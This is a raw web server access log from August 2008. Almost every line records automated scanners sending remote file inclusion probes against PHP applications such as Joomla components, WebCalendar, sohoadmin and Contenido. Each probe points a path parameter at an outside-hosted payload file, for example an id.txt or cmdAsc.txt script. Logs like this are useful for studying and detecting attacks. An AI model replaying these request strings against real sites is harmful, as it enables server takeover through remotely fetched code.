216.246.45.200 - - [24/Aug/2008:01:12:56 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 200 96475 "-""libwww-perl/5.810"
216.246.45.200 - - [24/Aug/2008:01:12:56 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 200 96475 "-""libwww-perl/5.810"
216.246.45.200 - - [24/Aug/2008:01:12:56 -0500] "GET //?path%5Bdocroot%5D=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.810"
216.246.45.200 - - [24/Aug/2008:01:12:56 -0500] "GET //?path%5Bdocroot%5D=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.810"
80.67.20.130 - - [24/Aug/2008:01:13:18 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 323 "-""libwww-perl/5.808"
80.67.20.130 - - [24/Aug/2008:01:13:19 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 318 "-""libwww-perl/5.808"
70.87.240.50 - - [24/Aug/2008:01:15:33 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://leqhi.com/id.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.812"
70.87.240.50 - - [24/Aug/2008:01:15:33 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://leqhi.com/id.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.812"
80.93.62.114 - - [24/Aug/2008:01:16:26 -0500] "GET /logs//include/write.php?dir=http://evikams.evi.com.hk/school_parent_kamlai/recommend/ids.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
80.93.62.114 - - [24/Aug/2008:01:16:26 -0500] "GET //include/write.php?dir=http://evikams.evi.com.hk/school_parent_kamlai/recommend/ids.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
218.189.215.153 - - [24/Aug/2008:01:18:01 -0500] "GET /logs/access_log.1213488000/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.topyn.com/ips.txt? HTTP/1.0" 404 367 "-""libwww-perl/5.805"
218.189.215.153 - - [24/Aug/2008:01:18:02 -0500] "GET /logs/access_log.1214179200/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.topyn.com/ips.txt? HTTP/1.0" 404 367 "-""libwww-perl/5.805"
217.20.113.117 - - [24/Aug/2008:01:18:55 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.tiibetinspanielit.fi/forum/ids.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
217.20.113.117 - - [24/Aug/2008:01:18:55 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.tiibetinspanielit.fi/forum/ids.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
74.6.8.121 - - [24/Aug/2008:01:19:51 -0500] "GET /logs/access_log.1173830400 HTTP/1.0" 200 171723 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
65.254.49.34 - - [24/Aug/2008:01:21:08 -0500] "GET /logs/access_log.1214524800//?path%5Bdocroot%5D=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
220.73.137.93 - - [24/Aug/2008:01:26:13 -0500] "GET /logs/access_log.1214438400/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://artemcity.ru/r0x.txt?? HTTP/1.1" 404 379 "-""libwww-perl/5.79"
72.5.54.215 - - [24/Aug/2008:01:26:16 -0500] "GET /logs/access_log.1214524800//?path%5Bdocroot%5D=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.65"
72.5.54.215 - - [24/Aug/2008:01:26:47 -0500] "GET /logs/access_log.1214524800//?path%5Bdocroot%5D=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.65"
72.5.54.215 - - [24/Aug/2008:01:26:54 -0500] "GET /logs/access_log.1214524800//?path%5Bdocroot%5D=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.65"
216.246.45.200 - - [24/Aug/2008:01:28:13 -0500] "GET /logs/access_log.1214524800//?path%5Bdocroot%5D=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
216.246.45.200 - - [24/Aug/2008:01:28:14 -0500] "GET /logs/access_log.1214524800//?path%5Bdocroot%5D=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
81.176.226.164 - - [24/Aug/2008:01:28:45 -0500] "GET /logs//com_sitemap/sitemap.php?mosConfig_admin_path=http://viniciu-s.net/cmdAsc.txt?????? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
81.176.226.164 - - [24/Aug/2008:01:28:45 -0500] "GET //com_sitemap/sitemap.php?mosConfig_admin_path=http://viniciu-s.net/cmdAsc.txt?????? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
70.87.240.50 - - [24/Aug/2008:01:29:32 -0500] "GET /logs/access_log.1214438400//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://leqhi.com/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.812"
70.87.240.50 - - [24/Aug/2008:01:29:32 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://leqhi.com/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.812"
70.87.240.50 - - [24/Aug/2008:01:29:33 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://leqhi.com/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.812"
65.254.49.34 - - [24/Aug/2008:01:29:58 -0500] "GET /logs/access_log.1214524800//jordanvalley/WebCalendar//tools/send_reminders.php?includedir=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 362 "-""libwww-perl/5.810"
65.254.49.34 - - [24/Aug/2008:01:29:58 -0500] "GET //jordanvalley/WebCalendar//tools/send_reminders.php?includedir=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.810"
65.254.49.34 - - [24/Aug/2008:01:29:58 -0500] "GET /logs//jordanvalley/WebCalendar//tools/send_reminders.php?includedir=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.810"
70.87.240.50 - - [24/Aug/2008:01:30:13 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://leqhi.com/id.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.812"
70.87.240.50 - - [24/Aug/2008:01:30:13 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://leqhi.com/id.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.812"
216.180.240.70 - - [24/Aug/2008:01:30:40 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 336 "-""libwww-perl/5.810"
216.180.240.70 - - [24/Aug/2008:01:30:40 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 331 "-""libwww-perl/5.810"
12.206.23.168 - - [24/Aug/2008:01:31:41 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://kriminologi.net/plugins/spamx/id.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
12.206.23.168 - - [24/Aug/2008:01:31:41 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://kriminologi.net/plugins/spamx/id.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
65.254.49.34 - - [24/Aug/2008:01:32:35 -0500] "GET /logs/access_log.1214438400//?path%5Bdocroot%5D=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
217.171.66.245 - - [24/Aug/2008:01:32:45 -0500] "GET /errors.php?error=http://freewebtown.com/ceasca/c.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
217.171.66.245 - - [24/Aug/2008:01:32:45 -0500] "GET /logs/errors.php?error=http://freewebtown.com/ceasca/c.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
217.171.66.245 - - [24/Aug/2008:01:32:45 -0500] "GET /errors.php?error=http://triangle-uiuc.org/test.txt??? HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
217.171.66.245 - - [24/Aug/2008:01:32:45 -0500] "GET /logs/errors.php?error=http://triangle-uiuc.org/test.txt??? HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
64.34.171.29 - - [24/Aug/2008:01:33:40 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.skkulove.com//bbs/c_h_i_t_o_z.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
64.34.171.29 - - [24/Aug/2008:01:33:40 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.skkulove.com//bbs/c_h_i_t_o_z.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
72.5.54.215 - - [24/Aug/2008:01:33:58 -0500] "GET /logs/access_log.1214524800//jordanvalley/WebCalendar//tools/send_reminders.php?includedir=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 362 "-""libwww-perl/5.65"
72.5.54.215 - - [24/Aug/2008:01:33:59 -0500] "GET //jordanvalley/WebCalendar//tools/send_reminders.php?includedir=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.65"
72.5.54.215 - - [24/Aug/2008:01:33:59 -0500] "GET /logs//jordanvalley/WebCalendar//tools/send_reminders.php?includedir=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.65"
216.246.45.200 - - [24/Aug/2008:01:34:03 -0500] "GET /logs/access_log.1214524800//jordanvalley/WebCalendar//tools/send_reminders.php?includedir=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 362 "-""libwww-perl/5.810"
216.246.45.200 - - [24/Aug/2008:01:34:03 -0500] "GET //jordanvalley/WebCalendar//tools/send_reminders.php?includedir=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.810"
216.75.56.186 - - [24/Aug/2008:01:34:03 -0500] "GET /logs/@scanhttp://suport08.freehostia.com/echo.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.803"
216.246.45.200 - - [24/Aug/2008:01:34:04 -0500] "GET /logs//jordanvalley/WebCalendar//tools/send_reminders.php?includedir=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.810"
216.75.56.186 - - [24/Aug/2008:01:34:06 -0500] "GET /@scanhttp://suport08.freehostia.com/echo.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.803"
216.246.45.200 - - [24/Aug/2008:01:34:08 -0500] "GET /logs/access_log.1214524800//jordanvalley/WebCalendar//tools/send_reminders.php?includedir=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 362 "-""libwww-perl/5.810"
216.246.45.200 - - [24/Aug/2008:01:34:08 -0500] "GET //jordanvalley/WebCalendar//tools/send_reminders.php?includedir=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.810"
216.246.45.200 - - [24/Aug/2008:01:34:08 -0500] "GET /logs//jordanvalley/WebCalendar//tools/send_reminders.php?includedir=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.810"
72.5.54.215 - - [24/Aug/2008:01:34:14 -0500] "GET /logs/access_log.1214524800//jordanvalley/WebCalendar//tools/send_reminders.php?includedir=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 362 "-""libwww-perl/5.65"
72.5.54.215 - - [24/Aug/2008:01:34:14 -0500] "GET //jordanvalley/WebCalendar//tools/send_reminders.php?includedir=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.65"
72.5.54.215 - - [24/Aug/2008:01:34:14 -0500] "GET /logs//jordanvalley/WebCalendar//tools/send_reminders.php?includedir=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.65"
72.5.54.215 - - [24/Aug/2008:01:34:14 -0500] "GET /logs/access_log.1214524800//jordanvalley/WebCalendar//tools/send_reminders.php?includedir=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 362 "-""libwww-perl/5.65"
72.5.54.215 - - [24/Aug/2008:01:34:14 -0500] "GET //jordanvalley/WebCalendar//tools/send_reminders.php?includedir=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.65"
72.5.54.215 - - [24/Aug/2008:01:34:15 -0500] "GET /logs//jordanvalley/WebCalendar//tools/send_reminders.php?includedir=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.65"
67.18.151.242 - - [24/Aug/2008:01:34:24 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.hotelsunflower.it/images/zoom/splash.me.gif? HTTP/1.1" 404 323 "-""libwww-perl/5.810"
67.18.151.242 - - [24/Aug/2008:01:34:24 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.hotelsunflower.it/images/zoom/splash.me.gif? HTTP/1.1" 404 318 "-""libwww-perl/5.810"
80.93.62.114 - - [24/Aug/2008:01:36:56 -0500] "GET /logs/access_log.1214524800//include/write.php?dir=http://evikams.evi.com.hk/school_parent_kamlai/recommend/ids.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
80.93.62.114 - - [24/Aug/2008:01:36:56 -0500] "GET //include/write.php?dir=http://evikams.evi.com.hk/school_parent_kamlai/recommend/ids.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
80.93.62.114 - - [24/Aug/2008:01:36:57 -0500] "GET /logs//include/write.php?dir=http://evikams.evi.com.hk/school_parent_kamlai/recommend/ids.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
65.254.49.34 - - [24/Aug/2008:01:38:33 -0500] "GET /logs/access_log.1206748800//?path%5Bdocroot%5D=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
65.254.49.34 - - [24/Aug/2008:01:38:50 -0500] "GET /logs/access_log.1213488000//?path%5Bdocroot%5D=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
72.5.54.215 - - [24/Aug/2008:01:38:58 -0500] "GET /logs/access_log.1214438400//?path%5Bdocroot%5D=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.65"
62.149.232.117 - - [24/Aug/2008:01:39:18 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 349 "-""libwww-perl/5.79"
62.149.232.117 - - [24/Aug/2008:01:39:19 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 344 "-""libwww-perl/5.79"
81.6.204.2 - - [24/Aug/2008:01:39:42 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
81.6.204.2 - - [24/Aug/2008:01:39:42 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
80.93.62.114 - - [24/Aug/2008:01:39:51 -0500] "GET /logs/access_log.1214438400//include/write.php?dir=http://evikams.evi.com.hk/school_parent_kamlai/recommend/ids.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
72.5.54.215 - - [24/Aug/2008:01:39:54 -0500] "GET /logs/access_log.1214438400//?path%5Bdocroot%5D=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.65"
89.200.171.55 - - [24/Aug/2008:01:39:59 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://civetta.altervista.org/dev/v6id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
89.200.171.55 - - [24/Aug/2008:01:39:59 -0500] "GET //?path%5Bdocroot%5D=http://civetta.altervista.org/dev/v6id.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
89.200.171.55 - - [24/Aug/2008:01:39:59 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://civetta.altervista.org/dev/v6id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
89.200.171.55 - - [24/Aug/2008:01:39:59 -0500] "GET //?path%5Bdocroot%5D=http://civetta.altervista.org/dev/v6id.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
89.200.171.55 - - [24/Aug/2008:01:40:00 -0500] "GET /logs//?path%5Bdocroot%5D=http://civetta.altervista.org/dev/v6id.txt?? HTTP/1.1" 200 96475 "-""libwww-perl/5.805"
89.200.171.55 - - [24/Aug/2008:01:40:01 -0500] "GET /logs//?path%5Bdocroot%5D=http://civetta.altervista.org/dev/v6id.txt?? HTTP/1.1" 200 96475 "-""libwww-perl/5.805"
72.5.54.215 - - [24/Aug/2008:01:40:01 -0500] "GET /logs/access_log.1214438400//?path%5Bdocroot%5D=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.65"
216.246.45.200 - - [24/Aug/2008:01:40:34 -0500] "GET /logs/access_log.1214438400//?path%5Bdocroot%5D=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
216.246.45.200 - - [24/Aug/2008:01:40:45 -0500] "GET /logs/access_log.1214438400//?path%5Bdocroot%5D=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
218.188.197.136 - - [24/Aug/2008:01:41:04 -0500] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.topyn.com/ips.txt? HTTP/1.1" 404 357 "-""libwww-perl/5.79"
218.188.197.136 - - [24/Aug/2008:01:41:05 -0500] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.topyn.com/ips.txt? HTTP/1.1" 404 352 "-""libwww-perl/5.79"
202.228.204.130 - - [24/Aug/2008:01:42:17 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://ploplop123.x10hosting.com/rfi/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
202.228.204.130 - - [24/Aug/2008:01:42:17 -0500] "GET //index.php?DOCUMENT_ROOT=http://ploplop123.x10hosting.com/rfi/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
72.9.233.10 - - [24/Aug/2008:01:42:34 -0500] "GET /logs//com_sitemap/sitemap.php?mosConfig_admin_path=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.810"
72.9.233.10 - - [24/Aug/2008:01:42:34 -0500] "GET //com_sitemap/sitemap.php?mosConfig_admin_path=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.810"
12.206.23.168 - - [24/Aug/2008:01:42:34 -0500] "GET /logs/access_log.1206230400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://kriminologi.net/plugins/spamx/id.txt??? HTTP/1.1" 404 365 "-""libwww-perl/5.805"
12.206.23.168 - - [24/Aug/2008:01:42:34 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://kriminologi.net/plugins/spamx/id.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
12.206.23.168 - - [24/Aug/2008:01:42:35 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://kriminologi.net/plugins/spamx/id.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
216.75.56.186 - - [24/Aug/2008:01:43:42 -0500] "GET /logs/access_log.1207180800/@scanhttp://suport08.freehostia.com/echo.txt? HTTP/1.1" 404 355 "-""libwww-perl/5.803"
64.34.171.29 - - [24/Aug/2008:01:44:15 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.skkulove.com//bbs/c_h_i_t_o_z.txt? HTTP/1.1" 200 96475 "-""libwww-perl/5.79"
64.34.171.29 - - [24/Aug/2008:01:44:15 -0500] "GET //?path%5Bdocroot%5D=http://www.skkulove.com//bbs/c_h_i_t_o_z.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
216.75.56.186 - - [24/Aug/2008:01:44:33 -0500] "GET /logs/access_log.1211500800/@scanhttp://suport08.freehostia.com/echo.txt? HTTP/1.1" 404 355 "-""libwww-perl/5.803"
89.200.171.55 - - [24/Aug/2008:01:45:02 -0500] "GET /logs/access_log.1206230400///vwar/backup/errors.php?error=http://civetta.altervista.org/dev/v6id.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
89.200.171.55 - - [24/Aug/2008:01:45:02 -0500] "GET /logs/access_log.1206230400///vwar/backup/errors.php?error=http://civetta.altervista.org/dev/v6id.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
89.200.171.55 - - [24/Aug/2008:01:45:02 -0500] "GET ///vwar/backup/errors.php?error=http://civetta.altervista.org/dev/v6id.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
89.200.171.55 - - [24/Aug/2008:01:45:02 -0500] "GET ///vwar/backup/errors.php?error=http://civetta.altervista.org/dev/v6id.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
89.200.171.55 - - [24/Aug/2008:01:45:03 -0500] "GET /logs///vwar/backup/errors.php?error=http://civetta.altervista.org/dev/v6id.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
89.200.171.55 - - [24/Aug/2008:01:45:03 -0500] "GET /logs///vwar/backup/errors.php?error=http://civetta.altervista.org/dev/v6id.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
70.87.240.50 - - [24/Aug/2008:01:45:09 -0500] "GET /logs/access_log.1213401600//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://leqhi.com/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.812"
72.5.54.215 - - [24/Aug/2008:01:45:39 -0500] "GET /logs/access_log.1206748800//?path%5Bdocroot%5D=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.65"
72.5.54.215 - - [24/Aug/2008:01:45:39 -0500] "GET /logs/access_log.1206748800//?path%5Bdocroot%5D=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.65"
72.5.54.215 - - [24/Aug/2008:01:45:58 -0500] "GET /logs/access_log.1213488000//?path%5Bdocroot%5D=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.65"
72.5.54.215 - - [24/Aug/2008:01:46:03 -0500] "GET /logs/access_log.1213488000//?path%5Bdocroot%5D=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.65"
89.200.171.55 - - [24/Aug/2008:01:46:30 -0500] "GET /logs/access_log.1208044800///vwar/backup/errors.php?error=http://civetta.altervista.org/dev/v6id.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
89.200.171.55 - - [24/Aug/2008:01:46:30 -0500] "GET /logs/access_log.1208044800///vwar/backup/errors.php?error=http://civetta.altervista.org/dev/v6id.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
72.5.54.215 - - [24/Aug/2008:01:46:40 -0500] "GET /logs/access_log.1206748800//?path%5Bdocroot%5D=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.65"
217.171.66.245 - - [24/Aug/2008:01:46:54 -0500] "GET /logs//errors.php?error=http://freewebtown.com/ceasca/c.txt??? HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
217.171.66.245 - - [24/Aug/2008:01:46:54 -0500] "GET //errors.php?error=http://freewebtown.com/ceasca/c.txt??? HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
217.171.66.245 - - [24/Aug/2008:01:46:54 -0500] "GET /logs//errors.php?error=http://triangle-uiuc.org/test.txt??? HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
217.171.66.245 - - [24/Aug/2008:01:46:54 -0500] "GET //errors.php?error=http://triangle-uiuc.org/test.txt??? HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
74.6.8.121 - - [24/Aug/2008:01:46:56 -0500] "GET /logs/access_log.1204848000 HTTP/1.0" 200 210753 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.18.151.242 - - [24/Aug/2008:01:46:57 -0500] "GET /logs//jordanvalley/WebCalendar//tools/send_reminders.php?includedir=http://www.hotelsunflower.it/images/zoom/splash.me.gif? HTTP/1.1" 404 340 "-""libwww-perl/5.810"
67.18.151.242 - - [24/Aug/2008:01:46:57 -0500] "GET //jordanvalley/WebCalendar//tools/send_reminders.php?includedir=http://www.hotelsunflower.it/images/zoom/splash.me.gif? HTTP/1.1" 404 335 "-""libwww-perl/5.810"
62.149.232.117 - - [24/Aug/2008:01:47:06 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 344 "-""libwww-perl/5.79"
62.149.232.117 - - [24/Aug/2008:01:47:08 -0500] "GET /logs/access_log.1205366400/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 371 "-""libwww-perl/5.79"
62.149.232.117 - - [24/Aug/2008:01:47:08 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 349 "-""libwww-perl/5.79"
72.5.54.215 - - [24/Aug/2008:01:47:09 -0500] "GET /logs/access_log.1213488000//?path%5Bdocroot%5D=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.65"
87.248.163.41 - - [24/Aug/2008:01:47:59 -0500] "GET /logs//com_sitemap/sitemap.php?mosConfig_admin_path=http://www.tes2008.kit.net/v6.txt?%0D?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
87.248.163.41 - - [24/Aug/2008:01:47:59 -0500] "GET //com_sitemap/sitemap.php?mosConfig_admin_path=http://www.tes2008.kit.net/v6.txt?%0D?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
62.149.232.117 - - [24/Aug/2008:01:48:23 -0500] "GET /logs/access_log.1214179200/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 371 "-""libwww-perl/5.79"
